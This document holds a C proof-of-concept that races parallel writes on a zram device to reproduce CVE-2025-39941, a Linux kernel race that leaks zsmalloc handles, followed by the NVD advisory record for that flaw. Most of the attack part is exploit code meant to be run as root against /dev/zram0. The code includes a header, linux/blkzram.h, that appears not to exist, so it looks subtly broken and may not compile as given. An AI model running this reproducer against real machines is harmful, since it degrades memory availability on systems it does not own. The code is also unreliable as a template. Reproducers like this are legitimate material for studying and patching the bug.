CVE-2025-39941

/* CVE-2025-39941 - zram slot write race condition PoC * This PoC demonstrates the race condition in zram slot write path * that leads to zsmalloc handle leaks. * * Compile: gcc -o poc_zram_race poc_zram_race.c -lpthread * Usage: sudo ./poc_zram_race /dev/zram0 */ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <pthread.h> #include <sys/ioctl.h> #include <linux/blkzram.h> #define NUM_THREADS 8 #define NUM_ITERATIONS 10000 #define PAGE_SIZE 4096 #define TARGET_INDEX 0 /* All threads write to the same zram index */ static int zram_fd; static volatile int start_flag = 0; typedef struct { int thread_id; int iterations; } thread_arg_t; void *race_worker(void *arg) { thread_arg_t *targ = (thread_arg_t *)arg; char *page = aligned_alloc(PAGE_SIZE, PAGE_SIZE); if (!page) { perror("aligned_alloc"); return NULL; } /* Wait for all threads to be ready */ while (!start_flag) { sched_yield(); } for (int i = 0; i < targ->iterations; i++) { /* Fill page with thread-specific data */ memset(page, targ->thread_id, PAGE_SIZE); /* Write to the same zram index to trigger race condition */ off_t offset = (off_t)TARGET_INDEX * PAGE_SIZE; if (pwrite(zram_fd, page, PAGE_SIZE, offset) < 0) { perror("pwrite"); break; } } free(page); return NULL; } int main(int argc, char *argv[]) { if (argc < 2) { fprintf(stderr, "Usage: %s <zram_device>\n", argv[0]); return 1; } zram_fd = open(argv[1], O_RDWR); if (zram_fd < 0) { perror("open zram device"); return 1; } pthread_t threads[NUM_THREADS]; thread_arg_t args[NUM_THREADS]; /* Create worker threads */ for (int i = 0; i < NUM_THREADS; i++) { args[i].thread_id = i; args[i].iterations = NUM_ITERATIONS; if (pthread_create(&threads[i], NULL, race_worker, &args[i]) != 0) { perror("pthread_create"); return 1; } } /* Start all threads simultaneously to maximize race condition chance */ usleep(100000); start_flag = 1; /* Wait for all threads to complete */ for (int i = 0; i < NUM_THREADS; i++) { pthread_join(threads[i], NULL); } printf("Race condition test completed. Check kernel logs for memory leaks.\n"); printf("Monitor with: cat /sys/block/zram0/mm_stat\n"); close(zram_fd); return 0; }

{"cve": {"id": "CVE-2025-39941", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T08:15:47.103", "lastModified": "2026-01-23T20:37:16.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nzram: fix slot write race condition\n\nParallel concurrent writes to the same zram index result in leaked\nzsmalloc handles. Schematically we can have something like this:\n\nCPU0 CPU1\nzram_slot_lock()\nzs_free(handle)\nzram_slot_lock()\n\t\t\t\tzram_slot_lock()\n\t\t\t\tzs_free(handle)\n\t\t\t\tzram_slot_lock()\n\ncompress\t\t\tcompress\nhandle = zs_malloc()\t\thandle = zs_malloc()\nzram_slot_lock\nzram_set_handle(handle)\nzram_slot_lock\n\t\t\t\tzram_slot_lock\n\t\t\t\tzram_set_handle(handle)\n\t\t\t\tzram_slot_lock\n\nEither CPU0 or CPU1 zsmalloc handle will leak because zs_free() is done\ntoo early. In fact, we need to reset zram entry right before we set its\nnew handle, all under the same slot lock scope."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.14", "versionEndExcluding": "6.16.9", "matchCriteriaId": "EE235AB0-05B1-418B-ADD0-620D5ABC03B9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:*", "matchCriteriaId": "327D22EF-390B-454C-BD31-2ED23C998A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:*", "matchCriteriaId": "C730CD9A-D969-4A8E-9522-162AAF7C0EE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:*", "matchCriteriaId": "39982C4B-716E-4B2F-8196-FA301F47807D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:*", "matchCriteriaId": "340BEEA9-D70D-4290-B502-FBB1032353B1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc5:*:*:*:*:*:*", "matchCriteriaId": "47E4C5C0-079F-4838-971B-8C503D48FCC2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc6:*:*:*:*:*:*", "matchCriteriaId": "5A4516A6-C12E-42A4-8C0E-68AEF3264504"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/ce4be9e4307c5a60701ff6e0cafa74caffdc54ce", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ff750e9f2c4d63854c33967d1646b5e89a9a19a2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}